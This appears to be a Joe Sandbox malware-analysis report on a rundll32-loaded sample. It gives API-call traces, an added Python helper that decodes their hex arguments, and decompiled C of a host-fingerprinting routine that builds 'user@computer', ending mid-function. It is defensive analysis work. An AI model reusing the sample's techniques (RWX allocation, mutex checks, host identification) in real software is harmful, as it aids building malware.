                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlenmemcpy$FreeLocal
                          • String ID:
                          • API String ID: 1123625124-0
                          • Opcode ID: 7a11485df8fba293a6272f19a26a6e3f0d0bf59c7a6244d9aab6d188cd6097be
                          • Instruction ID: b8c1c6014579e41f310229ebb28a9c071d482a1d962e155bfd6e33980b232a9a
                          • Opcode Fuzzy Hash: 7a11485df8fba293a6272f19a26a6e3f0d0bf59c7a6244d9aab6d188cd6097be
                          • Instruction Fuzzy Hash: 454116B690021AAFCF10EF65DC458AB3FA9FF042A0B154065FC09A7211E775EE60CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B68669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,05B62028,?), ref: 05B6867A
                            • Part of subcall function 05B68669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,05B62028,?), ref: 05B68697
                          • lstrlenW.KERNEL32(?,00000000,?,?,?), ref: 05B62055
                          • lstrlenW.KERNEL32(00000008,?,?,?), ref: 05B6205C
                          • lstrlenW.KERNEL32(?,?,?,?,?), ref: 05B6207A
                          • lstrlen.KERNEL32(00000000,?,00000000), ref: 05B62138
                          • lstrlenW.KERNEL32(?), ref: 05B62143
                          • wsprintfA.USER32 ref: 05B62185
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                            • Part of subcall function 05B6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 05B6F3DB
                            • Part of subcall function 05B6F39B: GetLastError.KERNEL32 ref: 05B6F3E5
                            • Part of subcall function 05B6F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 05B6F40A
                            • Part of subcall function 05B6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 05B6F42D
                            • Part of subcall function 05B6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 05B6F455
                            • Part of subcall function 05B6F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 05B6F46A
                            • Part of subcall function 05B6F39B: SetEndOfFile.KERNEL32(00001000), ref: 05B6F477
                            • Part of subcall function 05B6F39B: CloseHandle.KERNEL32(00001000), ref: 05B6F48F
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
                          • String ID:
                          • API String ID: 1727939831-0
                          • Opcode ID: dccedf223162223da647bbeb35938b429868f0b45adc89cfcdc0e7cafaf763b6
                          • Instruction ID: a468bf084bac066a25239ef0c544c6aef0318268969177411f4a709312da3fe5
                          • Opcode Fuzzy Hash: dccedf223162223da647bbeb35938b429868f0b45adc89cfcdc0e7cafaf763b6
                          • Instruction Fuzzy Hash: 1E513175A00109AFDF05EFA4DD89DBEBBBAFF44210B1540A5F914A7210EB39FA11DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,05B75583,00000000,00000000), ref: 05B67E46
                          • memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 05B67ED9
                          • GetLastError.KERNEL32(?,?,0000011F), ref: 05B67F31
                          • GetLastError.KERNEL32 ref: 05B67F63
                          • GetLastError.KERNEL32 ref: 05B67F77
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,05B75583,00000000,00000000,?,05B63EC6,?), ref: 05B67F8C
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$memcpy
                          • String ID:
                          • API String ID: 2760375183-0
                          • Opcode ID: b93a1fc53ce755e26b5e15984066808186bbcbd2df875378efe18e5c2f9edf9c
                          • Instruction ID: b5747ec77ead33ac7aef1004d79a10acaba96dc2f95f7261cda32f913835841d
                          • Opcode Fuzzy Hash: b93a1fc53ce755e26b5e15984066808186bbcbd2df875378efe18e5c2f9edf9c
                          • Instruction Fuzzy Hash: 5B515971910249BFDF10DFA4DC88EAEBBBAFB04354F044465F915E7280DB34AA55CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • lstrcpy.KERNEL32(?,00000020), ref: 05B7AEF4
                          • lstrcat.KERNEL32(?,00000020), ref: 05B7AF09
                          • lstrcmp.KERNEL32(00000000,?), ref: 05B7AF20
                          • lstrlen.KERNEL32(?), ref: 05B7AF44
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                          • String ID:
                          • API String ID: 3214092121-3916222277
                          • Opcode ID: 5f38b6f5e1e6b21f3da848222d5714ccf45f28cbaeb5c754025d6e7b073ab00d
                          • Instruction ID: ae3de961f58eb66d3e09644fee95a8b5e8bec3ab65334109a200f8198cb4e058
                          • Opcode Fuzzy Hash: 5f38b6f5e1e6b21f3da848222d5714ccf45f28cbaeb5c754025d6e7b073ab00d
                          • Instruction Fuzzy Hash: 75519E71A0460CEBCF61DF99C984AADBBB6FF45714F15809AE8369F241C770BA41CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlenW.KERNEL32(?,05B83D54,05FB9A2B,00000057), ref: 05B6D5A3
                          • lstrlenW.KERNEL32(?,05B83D54,05FB9A2B,00000057), ref: 05B6D5B4
                          • lstrlenW.KERNEL32(?,05B83D54,05FB9A2B,00000057), ref: 05B6D5C6
                          • lstrlenW.KERNEL32(?,05B83D54,05FB9A2B,00000057), ref: 05B6D5D8
                          • lstrlenW.KERNEL32(?,05B83D54,05FB9A2B,00000057), ref: 05B6D5EA
                          • lstrlenW.KERNEL32(?,05B83D54,05FB9A2B,00000057), ref: 05B6D5F6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen
                          • String ID:
                          • API String ID: 1659193697-0
                          • Opcode ID: fac3fa2521d9e11fc8d6d94a7ab888dd3b728ab245a07620be5fce11e8fe3014
                          • Instruction ID: 34f642bc511cdb3c1904f5831d35bdd12f65e8a6e3a9f475900cd5cba1890b67
                          • Opcode Fuzzy Hash: fac3fa2521d9e11fc8d6d94a7ab888dd3b728ab245a07620be5fce11e8fe3014
                          • Instruction Fuzzy Hash: BD41E071F0060AAFCB10DF99C884A6EB7FAFF94204B1489A9E556E7600D774F9058B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B724C3: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 05B724CF
                            • Part of subcall function 05B724C3: SetLastError.KERNEL32(000000B7,?,05B75C3C,?,?,00000000,?,?,?), ref: 05B724E0
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 05B75C5C
                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 05B75D34
                            • Part of subcall function 05B6A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05B6A990
                            • Part of subcall function 05B6A976: CreateWaitableTimerA.KERNEL32(05B8A1E8,00000001,?), ref: 05B6A9AD
                            • Part of subcall function 05B6A976: GetLastError.KERNEL32(?,00000000,05B78C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B6A9BE
                            • Part of subcall function 05B6A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6A9FE
                            • Part of subcall function 05B6A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6AA1D
                            • Part of subcall function 05B6A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6AA33
                          • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 05B75D1D
                          • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 05B75D26
                            • Part of subcall function 05B724C3: CreateMutexA.KERNEL32(05B8A1E8,00000000,?,?,05B75C3C,?,?,00000000,?,?,?), ref: 05B724F3
                          • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 05B75D41
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                          • String ID:
                          • API String ID: 1700416623-0
                          • Opcode ID: 9e579c809d6d0816db5bd8b1d14c0de04b0591be41c1ecccab971afcb300adf1
                          • Instruction ID: 38416d790f57d77a58715d6f9975456c53e015136963acfdc28e8b3ffc1ad038
                          • Opcode Fuzzy Hash: 9e579c809d6d0816db5bd8b1d14c0de04b0591be41c1ecccab971afcb300adf1
                          • Instruction Fuzzy Hash: 4B318675610208AFCB11AF74D84AD7D7FB7FB88310B2544A5F926DB290EA35B940CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlImageNtHeader.NTDLL(00000000), ref: 05B7C228
                            • Part of subcall function 05B6A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05B67D5E), ref: 05B6A6BE
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,05B689E4,00000000), ref: 05B7C26A
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 05B7C2BC
                          • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,05B689E4,00000000), ref: 05B7C2D5
                            • Part of subcall function 05B6E9EC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05B6EA0D
                            • Part of subcall function 05B6E9EC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,05B7C25B,00000000,00000000,00000000,00000001,?,00000000), ref: 05B6EA50
                          • GetLastError.KERNEL32(?,00000000,05B689E4,00000000,?,?,?,?,?,?,?,05B69100,?), ref: 05B7C30D
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                          • String ID:
                          • API String ID: 1921436656-0
                          • Opcode ID: 7b5f453024f53050d6d30ae8d120be259ee42f707c552b3b82f5a9883917217b
                          • Instruction ID: bd3b82cd40bf16035e5ae67118c8cba6c94c0a9d3cda613fd9f733653a0386b7
                          • Opcode Fuzzy Hash: 7b5f453024f53050d6d30ae8d120be259ee42f707c552b3b82f5a9883917217b
                          • Instruction Fuzzy Hash: CE310A75A10209ABDF25DF94C885EBE7FB6FF08650F01109AF915A7290DB34BE44DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 05B6A078
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B6A091
                          • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,00000000), ref: 05B6A09E
                          • lstrlen.KERNEL32(05B8B3A8,?,?,?,?,?,00000000,00000000,00000000), ref: 05B6A0B0
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 05B6A0E1
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                          • String ID:
                          • API String ID: 2734445380-0
                          • Opcode ID: 5783d8962f63a233ec3736bf5aaf71dbd0252a8b9a9d6890682d0fccdf03cc1c
                          • Instruction ID: b7fbf5a5999ad71513c0d0893d45f46dc037fccda5741fe2d69d1a722b066dbd
                          • Opcode Fuzzy Hash: 5783d8962f63a233ec3736bf5aaf71dbd0252a8b9a9d6890682d0fccdf03cc1c
                          • Instruction Fuzzy Hash: EE313A72500209FFCB11DF95DC89EEA7FB9FF44210F148054F919A2240EB79B955DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,05B63DA2,00000000,00000001,?,?,?), ref: 05B6DD92
                          • lstrlen.KERNEL32(?), ref: 05B6DDA2
                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05B6DDD6
                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 05B6DE01
                          • memcpy.NTDLL(00000000,?,?), ref: 05B6DE20
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B6DE81
                          • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 05B6DEA3
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Allocatelstrlenmemcpy$Free
                          • String ID:
                          • API String ID: 3204852930-0
                          • Opcode ID: 92e8ee774e3b8dffece3496f0b459b5a8f66e44ed81ec132fba07759b912942a
                          • Instruction ID: 6f76271534c280a1d1ca5ad201612c968bd51444d6feab3688dfc8228ea52c76
                          • Opcode Fuzzy Hash: 92e8ee774e3b8dffece3496f0b459b5a8f66e44ed81ec132fba07759b912942a
                          • Instruction Fuzzy Hash: 7F311AB290020AAFCF11DFA5CC859AE7FB9FF18244F044469F915A7211E735EA54DFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B770C3: RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B770CB
                            • Part of subcall function 05B770C3: RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B770E0
                            • Part of subcall function 05B770C3: InterlockedIncrement.KERNEL32(0000001C), ref: 05B770F9
                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05B71F04
                          • memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,05B78667,?,00000000), ref: 05B71F15
                          • lstrcmpi.KERNEL32(00000002,?), ref: 05B71F5B
                          • memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,05B78667,?,00000000), ref: 05B71F6F
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,05B78667,?,00000000), ref: 05B71FB5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                          • String ID:
                          • API String ID: 733514052-0
                          • Opcode ID: 0240cad9ea62b2507a1dd958e92fd833048660fd6d2bcc3de6ba89add7f24658
                          • Instruction ID: bec79e89b2927b2157ae7c7dca9b1656c6544ce58dced484b72941e8e4b15305
                          • Opcode Fuzzy Hash: 0240cad9ea62b2507a1dd958e92fd833048660fd6d2bcc3de6ba89add7f24658
                          • Instruction Fuzzy Hash: EC31A572A10618BFDB109FA8DC88AAE7FBAFB04254F144069F915AB240D735BD45DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B7D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,05B6243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 05B7D58C
                          • RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B62454
                          • RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B62467
                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05B62478
                          • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 05B624E3
                          • InterlockedIncrement.KERNEL32(05B8A43C), ref: 05B624FA
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                          • String ID:
                          • API String ID: 3915436794-0
                          • Opcode ID: 25492d060cc27fdcfff80ddd9f65c4ce01177583373128e673454d052660491f
                          • Instruction ID: 70e8c1a1a072912af76912575918b59c656265d36c557a630c6acf68f2b64a6d
                          • Opcode Fuzzy Hash: 25492d060cc27fdcfff80ddd9f65c4ce01177583373128e673454d052660491f
                          • Instruction Fuzzy Hash: 3131E136A052029FDB21DF28D85993AFBFAFB84335B04595AF95583240CB38F811CBD1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryA.KERNEL32(?,?,00000000,00000000,05B6E23D,00000000,76CDF5B0,05B70348,?,00000001), ref: 05B686CD
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B686E2
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B686FE
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B68713
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B68727
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad$AddressProc
                          • String ID:
                          • API String ID: 1469910268-0
                          • Opcode ID: 814f596abf8925a34ffef21a97de07fd12c35b30fed7610b37825ff091a01233
                          • Instruction ID: e4d052d2dd19c95c6a8555e6a4ca3fc172d804db78bcd902a11b543fe749e212
                          • Opcode Fuzzy Hash: 814f596abf8925a34ffef21a97de07fd12c35b30fed7610b37825ff091a01233
                          • Instruction Fuzzy Hash: 443141756202119FCB05EF68D482E757BEAFB0A7207916096F605D7350DB78F842CF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetUserNameW.ADVAPI32(00000000,?), ref: 05B7833B
                          • GetComputerNameW.KERNEL32(00000000,?), ref: 05B78357
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • GetUserNameW.ADVAPI32(76CC81D0,76C85520), ref: 05B78391
                          • GetComputerNameW.KERNEL32(?,?), ref: 05B783B4
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,76CC81D0,?,00000000,?,00000000,00000000), ref: 05B783D7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                          • String ID:
                          • API String ID: 3850880919-0
                          • Opcode ID: 71e8e2d6703081cd322a2e896110d17f4a14d29290eecee02757c7c46c980cce
                          • Instruction ID: 2fe631043caaefafc6b695a562efdfebb3c521000695a77165e37812ed962f8c
                          • Opcode Fuzzy Hash: 71e8e2d6703081cd322a2e896110d17f4a14d29290eecee02757c7c46c980cce
                          • Instruction Fuzzy Hash: 7C21D776900208FFDB11DFE8C989CEEBBBDEF44240B5144AAF512E7240EA30AB44DB54
                          Uniqueness

                          Uniqueness Score: -1.00%
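
The hex arguments in the API lines of these blocks carry the interesting facts, but only once decoded: VirtualAlloc with 00003000/00000040 is a 16 MiB MEM_COMMIT|MEM_RESERVE allocation with PAGE_EXECUTE_READWRITE, the OpenMutexA/SetLastError(000000B7) pair inside subcall 05B724C3 reports an existing mutex as ERROR_ALREADY_EXISTS, WideCharToMultiByte with 0000FDE9 converts to CP_UTF8, and the LoadLibraryA/GetProcAddress block resolves imports at run time. The following is an added helper for reading this report, not part of Joe Sandbox or of the sample: it parses lines in the API-trace format used above and names those constants. The sample input is copied from the blocks above, and the tables cover only the arguments that occur there; the finding texts in `triage` are my wording.

```python
"""Decode raw hex arguments in Joe Sandbox API-trace lines.
Added helper for reading this report, not part of Joe Sandbox or the sample."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# 'Api.MODULE(arg,...), ref: ADDR', optionally prefixed 'Part of subcall function XXXX: '.
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
# Bit-flag tables (decoded bit by bit, leftover bits reported as hex).
ALLOC_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
MUTEX_ACCESS = {0x100000: "SYNCHRONIZE", 0x1: "MUTEX_MODIFY_STATE"}
# Enumerations (exact value).
PAGE_PROT = {0x40: "PAGE_EXECUTE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x04: "PAGE_READWRITE"}
CODE_PAGE = {0xFDE9: "CP_UTF8", 0x0: "CP_ACP"}
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}
WIN_ERROR = {0xB7: "ERROR_ALREADY_EXISTS"}
# (API, zero-based argument index) -> (decoder kind, table)
DECODERS = {
    ("VirtualAlloc", 2): ("flags", ALLOC_TYPE), ("VirtualAlloc", 3): ("enum", PAGE_PROT),
    ("CreateFileW", 1): ("flags", GENERIC_ACCESS), ("OpenMutexA", 0): ("flags", MUTEX_ACCESS),
    ("WideCharToMultiByte", 0): ("enum", CODE_PAGE), ("SetFilePointer", 3): ("enum", MOVE_METHOD),
    ("SetLastError", 0): ("enum", WIN_ERROR),
}
# Constructed input: lines copied from the API blocks of this report.
SAMPLE = """\
• VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,05B689E4,00000000), ref: 05B7C2D5
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,76CC81D0,?,00000000,?,00000000,00000000), ref: 05B783D7
  • Part of subcall function 05B724C3: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 05B724CF
  • Part of subcall function 05B724C3: SetLastError.KERNEL32(000000B7,?,05B75C3C,?,?,00000000,?,?,?), ref: 05B724E0
• memset.NTDLL ref: 05B75A17
  • Part of subcall function 05B6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 05B6F455
• LoadLibraryA.KERNEL32(?,?,00000000,00000000,05B6E23D,00000000,76CDF5B0,05B70348,?,00000001), ref: 05B686CD
• GetProcAddress.KERNEL32(00000000,?), ref: 05B68713
"""

@dataclass
class ApiCall:
    api: str
    module: str
    args: list              # int per argument, None where the trace shows '?'
    ref: int                # call-site address from 'ref:'
    parent: str | None      # enclosing subcall function, if the line names one
    notes: list = field(default_factory=list)

def decode_flags(value: int, table: dict) -> str:
    names, rest = [], value
    for bit, name in sorted(table.items(), reverse=True):
        if rest & bit == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) or "0"

def parse_line(line: str) -> ApiCall | None:
    m = API_LINE.match(line.strip().lstrip("•").strip())
    if not m:
        return None
    raw = m.group("args")
    args = [None if a == "?" else int(a, 16) for a in raw.split(",")] if raw else []
    call = ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), m.group("parent"))
    for i, value in enumerate(args):
        spec = DECODERS.get((call.api, i))
        if spec and value is not None:
            kind, table = spec
            text = decode_flags(value, table) if kind == "flags" else table.get(value, f"0x{value:X}")
            call.notes.append(f"arg{i}={text}")
    return call

def parse_report(text: str) -> list[ApiCall]:
    return [c for c in map(parse_line, text.splitlines()) if c]

def triage(calls: list[ApiCall]) -> list[str]:
    """Combinations worth pulling out of a trace, grouped by enclosing function."""
    findings = []
    for c in calls:
        if c.api == "VirtualAlloc" and len(c.args) > 3 and c.args[3] == 0x40 and c.args[1]:
            findings.append(f"RWX allocation of 0x{c.args[1]:X} bytes at {c.ref:08X}")
        if c.api == "WideCharToMultiByte" and c.args[:1] == [0xFDE9]:
            findings.append(f"UTF-8 conversion at {c.ref:08X}")
    by_func: dict = {}
    for c in calls:
        by_func.setdefault(c.parent or "this function", set()).add((c.api, tuple(c.args[:1])))
    for func, seen in by_func.items():
        names = {api for api, _ in seen}
        if "OpenMutexA" in names and ("SetLastError", (0xB7,)) in seen:
            findings.append(f"{func}: existing mutex reported as ERROR_ALREADY_EXISTS (instance check)")
        if {"LoadLibraryA", "GetProcAddress"} <= names:
            findings.append(f"{func}: imports resolved at run time")
    return findings
```

Running `parse_report(SAMPLE)` and `triage(...)` over the copied lines yields the four observations listed in the lead-in. Arguments shown as `?` in the trace (values Joe Sandbox could not recover statically) stay `None` and are never decoded, so the decoder only labels values the report actually shows; the page's `SetLastError(000000B7)` is the ERROR_ALREADY_EXISTS value a caller of CreateMutex would normally see, which is why the open-then-create pair reads as an instance check.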

                          C-Code - Quality: 100%
			// Builds the host identifier "<user>@<computer>" as a NUL-terminated UTF-8 string
			// in a heap buffer (E01006D63 wraps RtlAllocateHeap, E01006C2C frees it).
			// Returns the buffer, or 0 on any failure.
			E01002A11() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);                 // size query: _v8 = user name length in WCHARs, including the terminator
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);         // size query: _v8 = computer name length in WCHARs, including the terminator
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x75bcc742
						_v12 = _v12 + _t11;             // WCHARs reserved for "<user>@<computer>"
						_t64 = E01006D63(_v12 + _t11 << 2);   // one allocation: UTF-8 result at the front, UTF-16 scratch copy behind it
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;     // UTF-16 scratch area starts _v12 WCHARs into the buffer
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E01006C2C(_t64);        // failure path: free the buffer, return 0
							} else {
								_t51 = 0x40;            // '@'
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;   // overwrite the user name terminator with '@'
								_t52 = _v8;
								_v12 = _v12 - _t52;     // capacity left after "<user>@"
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {   // computer name lands right after the '@'; _v12 = chars written, no terminator
									goto L7;
								} else {
									_t56 = _v12 + _v8;  // length of "<user>@<computer>" in WCHARs
									_t31 = _t56 + 2; // 0x10057e9
									_v12 = _t56;
									// 0xfde9 = CP_UTF8; output capacity is 2*len+2 bytes, enough for 1- and 2-byte sequences,
									// so names made of 3-byte UTF-8 characters fail the conversion and take the free path.
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
